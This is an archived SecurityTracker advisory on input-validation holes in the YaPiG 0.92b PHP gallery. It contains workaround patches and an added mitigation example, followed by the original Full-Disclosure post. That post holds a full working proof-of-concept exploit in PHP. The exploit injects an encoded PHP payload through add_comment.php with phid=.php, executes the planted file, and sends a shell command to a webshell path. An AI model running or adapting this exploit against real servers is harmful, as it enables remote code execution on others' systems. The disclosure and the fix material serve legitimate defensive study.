SecurityTracker.com
Category:   Application (Multimedia)  >   YaPiG
Vendors:   yapig.sourceforge.net
YaPiG Input Validation Holes Let Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1010970
SecurityTracker URL:  http://securitytracker.com/id/1010970
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Aug 18 2004
Impact:   Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 0.92b
Description:   An input validation vulnerability was reported in YaPiG. A remote user can execute arbitrary operating system commands on the target system.

aCiDBiTS reported that 'add_comment.php' and 'functions.php' do not properly validate user-supplied input. The 'phid' parameter is concatenated unchecked into the name of the comments file, so a remote user can create a file with an arbitrary file extension, and the comment fields are written to that file unescaped, so the file can contain arbitrary contents.

A remote user can exploit these flaws to upload a PHP file and then have the web server execute the PHP code.

Impact:   A remote user can execute arbitrary commands on the target system with the privileges of the target web service.
Solution:   No vendor solution was available at the time of this entry.

The author of the report has provided the following unofficial workaround:

add_comment.php
line 105:
	$comments_file= $gid_dir . $gid . "_" . $phid;
Modify with:
	$comments_file= $gid_dir . $gid . "_" . intval($phid);

functions.php, construct_comment_line()
line 699-700:
	$linea=$linea . $data_array['mail'] . $SEPARATOR;
	$linea=$linea . $data_array['web'] . $SEPARATOR;
Modify with:
	$linea=$linea . htmlspecialchars($data_array['mail']) . $SEPARATOR;
	$linea=$linea . htmlspecialchars($data_array['web']) . $SEPARATOR;
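The following is an added example, not YaPiG's code and not part of the original report or advisory. It shows the two mitigations from the workaround above in isolation: the comments file name is built only from a value that is verified to be a positive integer (stricter than the intval() cast in the workaround, which would silently turn ".php" into 0), and every browser-supplied comment field is escaped before it is written, so a PHP open tag inside the 'mail' field can never be interpreted as code. The directory, the field names and the sample inputs are constructed for the example; the real script's variable names and separator may differ. Requires PHP 7 or later.

```php
<?php
// Added example (not YaPiG's own code). $gid_dir is assumed to be a trusted,
// server-side directory; comments are assumed to be stored one per line.

// Build the comments file path. The vulnerable version concatenates $phid
// verbatim, so a value such as ".php" produces "<gid>_.php". Here the value is
// accepted only if it is a pure positive integer; anything else is rejected
// instead of being coerced, which also gives the application a clear point
// at which to log the attempt.
function comments_file(string $gid_dir, int $gid, string $phid): string
{
    if (!preg_match('/^[1-9][0-9]*$/', $phid)) {
        throw new InvalidArgumentException("phid must be a positive integer, got '$phid'");
    }
    return $gid_dir . $gid . '_' . intval($phid);
}

// Build one comment record. Every field originates from the browser, so each
// one is escaped with htmlspecialchars(); the separator character is removed
// from field values so a field cannot inject extra columns into the record.
function construct_comment_line(array $data, string $separator = '|'): string
{
    $line = '';
    foreach (['tit', 'aut', 'mail', 'web', 'msg'] as $key) {
        $value = $data[$key] ?? '';
        $value = str_replace($separator, '', $value);
        $line .= htmlspecialchars($value, ENT_QUOTES) . $separator;
    }
    return $line;
}

// Constructed inputs modelled on the advisory: a non-numeric phid, and a
// 'mail' field carrying a PHP open tag.
$constructed_comment = [
    'tit'  => 'a',
    'aut'  => 'a',
    'mail' => '<?php echo "injected"; ?>',
    'web'  => 'http://example.invalid/|extra',
    'msg'  => 'a',
];

// 1. The malformed photo id is refused; a well-formed one yields "<gid>_<phid>".
try {
    comments_file('/var/www/yapig/photos/album/', 5, '.php');
    echo "FAIL: non-numeric phid was accepted\n";
} catch (InvalidArgumentException $e) {
    echo "rejected: " . $e->getMessage() . "\n";
}
echo comments_file('/var/www/yapig/photos/album/', 5, '12') . "\n";

// 2. The comment record contains no '<' at all, so even if the file were ever
//    served as PHP there is nothing in it that opens a code block, and the
//    stray separator in 'web' has not created an extra column.
$line = construct_comment_line($constructed_comment);
echo $line . "\n";
assert(strpos($line, '<') === false);
assert(substr_count($line, '|') === 5);
```

Run it with php from the command line; the first call reports the rejected photo id, the second prints the safe path, and the final line shows the escaped record with the two assertions passing silently.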

Vendor URL:  yapig.sourceforge.net/
Cause:   Access control error, Input validation error
Underlying OS:   Linux (Any), UNIX (Any)

Message History:   This archive entry has one or more follow-up message(s) listed below.
Oct 18 2004 (Vendor Issues Fix) YaPiG Input Validation Holes Let Remote Users Execute Arbitrary Commands
The vendor has issued a fix.



 Source Message Contents

Date:  Tue, 17 Aug 2004 16:18:18 +0000
Subject:  [Full-Disclosure] YaPiG 0.92b add_coment PHP Insertion Proof of Concept


#!/usr/bin/php

<?

/*

	YaPiG 0.92b add_coment PHP Insertion Proof of Concept
	By aCiDBiTS    acidbits@hotmail.com    07-August-2004


	Description:

	YaPiG (http://yapig.sourceforge.net/) is a PHP Image Gallery script.
	This Proof of Concept creates a php file that echoes a notice.
	First it determines a valid photo directory where to create the script.
	Then creates a crafted comment saved in a new .php file. This comment
	contains an encoded webshell.	Once this .php file is opened, the code
	contained creates test.php.

	Usage (in my debian box):
	php4 -q yapig_addc_poc.php "http://127.0.0.1/yapig-0.92b"


	Vulnerability:

	There is no user input sanitization of some parameters in add_comment.php
	and functions.php. This allows creating a file with any extension, and we
	can insert any code in it. Version 0.92b is vulnerable, I haven't tested
	older ones.


	Workaround. Modify these lines of code:

	add_comment.php
	line 105:
		$comments_file= $gid_dir . $gid . "_" . $phid;
	Modify with:
		$comments_file= $gid_dir . $gid . "_" . intval($phid);

	functions.php, construct_comment_line()
	line 699-700:
		$linea=$linea . $data_array['mail'] . $SEPARATOR;
		$linea=$linea . $data_array['web'] . $SEPARATOR;
	Modify with:
		$linea=$linea . htmlspecialchars($data_array['mail']) . $SEPARATOR;
		$linea=$linea . htmlspecialchars($data_array['web']) . $SEPARATOR;

*/


echo "+-------------------------------------------------------+\n| YaPiG 0.92b add_coment PHP Insertion Proof of Concept |\n| By aCiDBiTS    acidbits@hotmail.com    07-August-2004 |\n+-------------------------------------------------------+\n\n";

$websh="<?php 
\$f=fopen(trim(base64_decode(dGVzdC5waHAg)),w);fputs(\$f,trim(base64_decode(PD8gZWNobyAnPHByZT4gXCAgLyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgXCAgLzxicj4gKE9vKSAgVGhpcyBnYWxsZXJ5IGlzIHZ1bG5lcmFibGUgISAgKG9PKTxicj4vL3x8XFxcXCAgICAgICAgICAgICAgICA
gICAgICAgICAgICAgIC8vfHxcXFxcIDwvcHJlPic7Pz4K)));fclose(\$f); 
  ?>";

if($argc<2)	die("Usage: ".$argv[0]." URL_to_YaPiG_script\n\n");
$host=$argv[1];
if(substr($host,strlen($host)-1,1)!='/') $host.='/';

echo "[+] Getting valid gid & photo path ... ";
$webc=get_web($host);
$temp=explode(";gid=",$webc);
$gid=intval($temp[1]);
$temp=explode("photos/",$webc);
$temp=explode("/",$temp[1]);
$path=$temp[0];
if( !$gid || !$path ) die( "Failed!\n\n");
echo "OK\n    GID: $gid\n    Path: ".$host."photos/".$path."/\n\n";

echo "[+] Creating notice script file ... ";
send_post( $host."add_comment.php?gid=".$gid."&phid=.php", 
"tit=a&aut=a&mail=".urlencode($websh)."&web=&msg=a&date=&send=Send");
$webc=get_web( $host."photos/".$path."/".$gid."_.php" );
send_post( $host."photos/".$path."/acidwebshell.php", "c=".urlencode("rm 
".$gid."_.php") );
echo "OK\n    Now go to: ".$host."photos/".$path."/test.php";


die("\n\n     \  /         \  /\n     (Oo)  Done!  (oO)\n    //||\\\\       //||\\\\\n\n");


function get_web($url)
{
	$ch=curl_init();
	curl_setopt ($ch, CURLOPT_URL, $url);
	curl_setopt ($ch, CURLOPT_HEADER, 0);
	curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
	$data=curl_exec ($ch);
	curl_close ($ch);
	return $data;
}

function send_post($url,$data)
{
	$ch=curl_init();
	curl_setopt ($ch, CURLOPT_URL, $url );
	curl_setopt ($ch, CURLOPT_HEADER, 0);
	curl_setopt ($ch, CURLOPT_RETURNTRANSFER,1);
	curl_setopt ($ch, CURLOPT_POST, 1);
	curl_setopt ($ch, CURLOPT_POSTFIELDS, $data );
	$data=curl_exec ($ch);
	curl_close ($ch);
	return $data;
}

/*              \    /
                 (Oo)
                //||\\    */

?>


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Copyright 2012, SecurityGlobal.net LLC